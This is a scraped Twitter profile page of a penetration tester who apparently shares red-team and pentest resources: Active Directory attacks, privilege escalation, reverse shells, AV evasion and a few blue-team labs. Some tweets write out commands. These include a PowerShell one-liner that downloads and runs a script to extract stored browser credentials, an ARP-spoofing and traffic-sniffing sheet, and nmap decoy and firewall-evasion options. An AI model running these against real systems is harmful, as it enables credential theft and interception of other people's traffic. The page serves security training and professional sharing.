Florian Hansemann @CyberWarship Twitter profile

Pinned Tweet

Florian Hansemann

@CyberWarship

4 years

Meterpreter session 1 opened #infosec #phishing #happyHacking

40

33

410

Last Seen Profiles

@OllyBausor

@dobyboby81

@noki57693298

@VmaniakJ

@Alan14108612

@Zeyad_shfc

@InsideKaduna_

@USAHindiMein

@handshakeeng

@stwmaniax

@opormore

@chilluvandu

@DrSTANtheMAN

@xiaozhaokunkun

@gorgeous4ew

@Allodoxaa

@pokeka8181

@Dinachin

@ottomanfremilne

@bokeplokalmalam

@zayedkhan1802

@shai94494703

@KimRiversa

@blank0429

@ily2seo

@soundtrack1000

@_barbudinho15

@__HORIZON__

@salmukaimy

@Fr94jm

@orjacko

@_dickuu

@cuntiballistic

@bosimpact

@alex_looker

@stw46

Florian Hansemann

@CyberWarship

3 years

Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference

3

624

2K

Florian Hansemann

@CyberWarship

3 years

Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference

10

556

1K

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

8

423

1K

Florian Hansemann

@CyberWarship

5 years

A post-exploitation powershell tool for extracting juicy info from memory. #infosec #pentest #redteam

9

432

1K

Florian Hansemann

@CyberWarship

4 years

Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam

3

269

1K

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

6

386

1K

Florian Hansemann

@CyberWarship

3 years

ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam

8

306

1K

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

10

358

956

Florian Hansemann

@CyberWarship

5 years

Red Teaming Toolkit Collection #infosec #pentest #redteam

Red Teaming Toolkit Collection -

Red Teaming/Adversary Simulation Toolkit [√] please join our telegram channel Telegram Channel Reconnaissance Active Intelligence Gathering EyeWitness is designed to take screenshots of websites,...

0xsp.com

0

371

938

Florian Hansemann

@CyberWarship

4 years

Docker for Pentesters - My biggest problem in my job is the limited time. That's why I'm all the more grateful to my friend @ropnop for this great post. Have a look, it's super helpful! #infosec #pentest #bugbounty

Docker for Pentesters

Docker has become such an integral part of my worfklow recently. These examples should demonstrate how Docker can help you be a more efficient pentester

blog.ropnop.com

5

289

911

Florian Hansemann

@CyberWarship

4 years

Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam

6

255

893

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

4

340

889

Florian Hansemann

@CyberWarship

4 years

I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam

2

297

871

Florian Hansemann

@CyberWarship

5 years

Antivirus Evasion with Python - really good read! #infosec #pentest #redteam

4

347

833

Florian Hansemann

@CyberWarship

5 years

The Regex Cheat Sheet #infosec

4

312

838

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

5

369

838

Florian Hansemann

@CyberWarship

5 years

Undetectable C# & C++ Reverse Shells - don't forget, it's just a title ;-) still some good ideas to bypass AVs #infosec #pentest #redteam

Undetectable C# & C++ Reverse Shells

Technical overview of different way to spawn a reverse shell on a victim machine

bank-security.medium.com

4

327

822

Florian Hansemann

@CyberWarship

3 years

Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam

9

244

817

Florian Hansemann

@CyberWarship

5 years

Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉 #infosec #pentest #redteam

1

318

803

Florian Hansemann

@CyberWarship

5 years

Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam

5

351

803

Florian Hansemann

@CyberWarship

4 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

6

293

789

Florian Hansemann

@CyberWarship

4 years

Antivirus Evasion with Python - really good read! #infosec #pentest #redteam

6

309

775

Florian Hansemann

@CyberWarship

4 years

File upload vulnerability scanner and exploitation tool #infosec #pentest #bugbounty

1

269

774

Florian Hansemann

@CyberWarship

6 years

nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest

7

341

783

Florian Hansemann

@CyberWarship

4 years

Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec #pentest

16

219

736

Florian Hansemann

@CyberWarship

2 years

"Windows 11 reverse shell in 7steps, undetected by Microsoft Defender" #redteam #infosec #pentest

8

206

745

Florian Hansemann

@CyberWarship

6 years

Red Teaming Mind Map from The Hacker Playbook 3 #infosec #pentest #redteam

4

342

732

Florian Hansemann

@CyberWarship

5 years

Extracting SSH Private Keys from Windows 10 ssh-agent #infosec #pentest #redteam

Extracting SSH Private Keys From Windows 10 ssh-agent

The newest Windows 10 update includes OpenSSH utilities, including ssh-agent. Here’s how to extract unencrypted saved private keys from the registry

blog.ropnop.com

2

294

711

Florian Hansemann

@CyberWarship

5 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

6

303

714

Florian Hansemann

@CyberWarship

4 years

Penetration Testing / OSCP Biggest Reference Bank - really huge list #infosec #pentest #OSCP

6

203

706

Florian Hansemann

@CyberWarship

5 years

Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam

GitHub - HanseSecure/credgrap_ie_edge: Extract stored credentials from Internet Explorer and Edge

Extract stored credentials from Internet Explorer and Edge - HanseSecure/credgrap_ie_edge

github.com

12

341

710

Florian Hansemann

@CyberWarship

4 years

AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam

3

199

711

Florian Hansemann

@CyberWarship

5 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

3

293

709

Florian Hansemann

@CyberWarship

4 years

A Red Teamer's guide to pivoting #infosec #pentest #redteam

3

263

703

Florian Hansemann

@CyberWarship

4 years

I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam

6

268

701

Florian Hansemann

@CyberWarship

4 years

SQL Injection Cheat Sheet - one of the best SQL cheats out there! #infosec #pentest #bugbounty

4

231

693

Florian Hansemann

@CyberWarship

6 years

nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest

8

285

690

Florian Hansemann

@CyberWarship

5 years

A Beginner’s Guide to OSINT Investigation with Maltego #infosec #pentest #OSINT

A Beginner’s Guide to OSINT Investigation with Maltego

What is Maltego and why use it for OSINT?

wondersmithrae.medium.com

4

274

680

Florian Hansemann

@CyberWarship

4 years

Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam

Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases

In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.

www.netspi.com

2

282

681

Florian Hansemann

@CyberWarship

5 years

Windows Privilege Escalation Guide #infosec #pentest #redteam

5

271

671

Florian Hansemann

@CyberWarship

4 years

Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam

Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases

In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.

www.netspi.com

0

248

661

Florian Hansemann

@CyberWarship

3 years

Top 16 Active Directory Vulnerabilities This article provides practical information on how to pentest Active Directory environments using a list of 16 most common AD vulnerabilities and mis-configurations. #pentest #infosec #redteam

0

231

652

Florian Hansemann

@CyberWarship

4 years

Finding SSRF via HTML Injection inside a PDF file on AWS EC2 #infosec #pentest #bugbounty

Finding SSRF via HTML Injection inside a PDF file on AWS EC2

Finding SSRF on app hosted on AWS EC2 allows for data theft from AWS account. Capital One lost 100M+ bank records due to an issue like…

blog.appsecco.com

3

280

646

Florian Hansemann

@CyberWarship

5 years

Beginners Guide to Burpsuite Payloads (Part 1) #infosec #pentest #bugbounty

Beginners Guide to Burpsuite Payloads (Part 1) - Hacking Articles

Hello friends!! Today we are discussing about the “Types of Payload in Burp Suite”. Burp Suite is an application which is used for testing Web

www.hackingarticles.in

4

220

639

Florian Hansemann

@CyberWarship

5 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

7

262

629

Florian Hansemann

@CyberWarship

6 years

Passing OSCP - really huge command reference for pentesting and the like #infosec #pentest #bugbounty

4

268

621

Florian Hansemann

@CyberWarship

6 years

Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute #infosec #pentest

GitHub - peewpw/Invoke-PSImage: Encodes a PowerShell script in the pixels of a PNG file and...

Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute - peewpw/Invoke-PSImage

github.com

4

360

622

Florian Hansemann

@CyberWarship

4 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

2

248

625

Florian Hansemann

@CyberWarship

5 years

Attacking Azure, Azure AD, and Introducing PowerZure #infosec #pentest #redteam

Attacking Azure, Azure AD, and Introducing PowerZure

Interacting with Azure, offensively

posts.specterops.io

1

265

620

Florian Hansemann

@CyberWarship

4 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

3

170

603

Florian Hansemann

@CyberWarship

3 years

ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam

9

219

613

Florian Hansemann

@CyberWarship

5 years

Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam

2

283

612

Florian Hansemann

@CyberWarship

5 years

Simple Webserver with ncat ncat --keep-open -l -p 1337 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html" What's your way to quickly start a webserver ? 😎 #infosec #pentest

18

189

593

Florian Hansemann

@CyberWarship

5 years

Windows Privilege Escalation Guide #infosec #pentest #redteam

1

240

602

Florian Hansemann

@CyberWarship

5 years

Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉 #infosec #pentest #redteam

3

209

598

Florian Hansemann

@CyberWarship

4 years

Threat Hunting: Log Monitoring Lab Setup with ELK #infosec #blueteam #DFIR

Threat Hunting: Log Monitoring Lab Setup with ELK - Hacking Articles

Elastic Stack is formerly known as the ELK Stack. Elk Stack is a collection of free opensource software from Elastic Company which is specially designed

www.hackingarticles.in

4

174

594

Florian Hansemann

@CyberWarship

4 years

Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec

7

198

587

Florian Hansemann

@CyberWarship

4 years

A Red Teamer's guide to pivoting #infosec #pentest #redteam

2

207

590

Florian Hansemann

@CyberWarship

5 years

I have done it 😊 #infosec #OSWE #tryHarder

70

21

588

Florian Hansemann

@CyberWarship

4 years

AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam

3

207

588

Florian Hansemann

@CyberWarship

3 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

1

230

586

Florian Hansemann

@CyberWarship

3 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

1

215

583

Florian Hansemann

@CyberWarship

4 years

Seeing so many Hacker, Consultant, Security Engineers, Pentester, ... and nobody uses ncat -ssl $IP $Port Instead of nc $IP $Port There is something called encryption, especially while doing remote stuff via the Internet 😒 #infosec #pentest #redteam #hacking

17

123

563

Florian Hansemann

@CyberWarship

4 years

Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam

7

149

582

Florian Hansemann

@CyberWarship

5 years

Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam

3

229

577

Florian Hansemann

@CyberWarship

4 years

Win Brute Logon - local password brute force #infosec #pentest

8

133

564

Florian Hansemann

@CyberWarship

4 years

Simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords #infosec #pentest

3

214

561

Florian Hansemann

@CyberWarship

5 years

Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam

1

169

559

Florian Hansemann

@CyberWarship

4 years

Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam

Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases

In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.

www.netspi.com

5

199

547

Florian Hansemann

@CyberWarship

4 years

Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam

6

208

553

Florian Hansemann

@CyberWarship

2 years

"Did You Know Your Browser’s Autofill Credentials Could Be Stolen via Cross-Site Scripting (XSS)" #infosec #pentest #redteam

9

175

552

Florian Hansemann

@CyberWarship

1 year

"CS:GO: From Zero to 0-day" #infosec #pentest #redteam

5

104

530

Florian Hansemann

@CyberWarship

5 years

Active Directory Assessment and Privilege Escalation Script - thanks for sharing @Haus3c #infosec #pentest #redteam

1

195

544

Florian Hansemann

@CyberWarship

3 years

HOW ATTACKERS ARE BYPASSING POWERSHELL PROTECTIONS #infosec #pentest #redteam #blueteam

5

169

532

Florian Hansemann

@CyberWarship

5 years

Windows Privilege Escalation Guide #infosec #pentest #redteam

4

219

530

Florian Hansemann

@CyberWarship

2 years

Make a USB Rubber Ducky with less than $3 #infosec #pentest #redteam

6

154

522

Florian Hansemann

@CyberWarship

3 years

AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam

3

210

524

Florian Hansemann

@CyberWarship

4 years

A collection of open source and commercial tools that aid in red team operations. - super useful resource! #infosec #pentest #redteam

6

189

530

Florian Hansemann

@CyberWarship

4 years

Lateral Movement \ Windows and Active Directory - great content & very well written, thanks for sharing @dottor_morte #infosec #pentest #redteam

3

218

518

Florian Hansemann

@CyberWarship

4 years

Threat Hunting: Log Monitoring Lab Setup with ELK #infosec #blueteam #DFIR

Threat Hunting: Log Monitoring Lab Setup with ELK - Hacking Articles

Elastic Stack is formerly known as the ELK Stack. Elk Stack is a collection of free opensource software from Elastic Company which is specially designed

www.hackingarticles.in

2

126

520

Florian Hansemann

@CyberWarship

3 years

I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam

3

215

522

Florian Hansemann

@CyberWarship

5 years

OSINT Resources for 2019 #infosec #pentest #OSINT #bugbounty

OSINT Resources for 2019

Let’s take a look at some essential OSINT resources plus recent developments in the areas of data, tooling, content and community.

medium.com

4

203

509

Florian Hansemann

@CyberWarship

4 years

Threat Hunting: Log Monitoring Lab Setup with ELK #infosec #blueteam #DFIR

Threat Hunting: Log Monitoring Lab Setup with ELK - Hacking Articles

Elastic Stack is formerly known as the ELK Stack. Elk Stack is a collection of free opensource software from Elastic Company which is specially designed

www.hackingarticles.in

2

174

496

Florian Hansemann

@CyberWarship

4 years

Windows Exploit Suggester - Next Generation #infosec #pentest #redteam

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

Windows Exploit Suggester - Next Generation. Contribute to bitsadmin/wesng development by creating an account on GitHub.

github.com

0

150

490

Florian Hansemann

@CyberWarship

6 years

Undetectable C# & C++ Reverse Shells #infosec #pentest #redteam

Undetectable C# & C++ Reverse Shells

Technical overview of different way to spawn a reverse shell on a victim machine

bank-security.medium.com

2

248

488

Florian Hansemann

@CyberWarship

5 years

RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation #infosec #pentest #redteam

RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an…

How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to…

doublepulsar.com

3

226

486

Florian Hansemann

@CyberWarship

2 years

red-team-scripts: A collection of Red Team focused tools, scripts, and notes #infosec #pentest #redteam

3

163

483

Florian Hansemann

@CyberWarship

5 years

MitM Copy&Paste Sheet 😎 #forwarding sysctl -w net.ipv4.ip_forward=1 #redirect Traffic arpspoof -i [Interface] -t [tgtIP] [RouterIP] arpspoof -i [Interface] -t [RouterIP] [tgtIP] #sniff pictures driftnet -i [Interface] #sniff URLs urlsnarf -i [Interface] #infosec #pentest

3

193

479

Florian Hansemann

@CyberWarship

5 years

SQL Injection Cheat Sheet - super useful one! #infosec #pentest #bugbounty

1

184

472

Florian Hansemann

@CyberWarship

4 years

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin - from 2017 but still useful 🤔 thanks for sharing @Haus3c #infosec #pentest #redteam

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a t…

hausec.com

2

150

472

Florian Hansemann

@CyberWarship

5 years

For all Hunters on @hackthebox_eu or the Like: plz safety first via apt-get install ufw ufw default deny incoming ufw enable For Connection from target to you port: ufw allow from $target to any port $port And Now: Hack the Planet! 😎 #infosec #pentest #hacking #CTF

9

151

474

Florian Hansemann

@CyberWarship

2 years

"LinuxForensics: Everything related to Linux Forensics" #pentest #redteam #infosec

1

147

470

Florian Hansemann

@CyberWarship

5 years

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😲 WriteUp Code #infosec #pentest #blueteam #redteam

Introducing: Detection Lab

Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete…

medium.com

1

196

468

Florian Hansemann

@CyberWarship

5 years

The Internals of AppLocker Part 1: Overview and Setup Part 2: Blocking Process Creation Part 3: Access Tokens and Access Checking Part 4: Blocking DLL Loading #infosec #blueteam

0

222

475

Florian Hansemann

@CyberWarship

5 years

File upload vulnerability scanner and exploitation tool. #infosec #pentest #bugbounty

2

192

464

Florian Hansemann

@CyberWarship

5 years

HackBar plugin for Burpsuite #infosec #pentest #bugbounty

2

182

462

Florian Hansemann

@CyberWarship

4 years

No Privilege Escalating through standard methods ? whoami /priv If you got one of these == win 😉 SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate #infosec #pentest #redteam

3

140

459

Florian Hansemann

@CyberWarship

3 years

Azure-Red-Team: Azure Security Resources and Notes #infosec #pentest #redteam

2

164

463

Florian Hansemann

@CyberWarship

6 years

Windows Privilege Escalation Guide #infosec #pentest #redteam

3

219

458

Florian Hansemann

@CyberWarship

5 years

Attack Methods for Gaining Domain Admin Rights in Active Directory #infosec #pentest #redteam

Attack Methods for Gaining Domain Admin Rights in Active Directory

There are many ways an attacker can gain Domain Admin rights in Active Directory. This post is meant to describe some of the more popular ones in current use. The techniques described here "assume...

adsecurity.org

0

210

459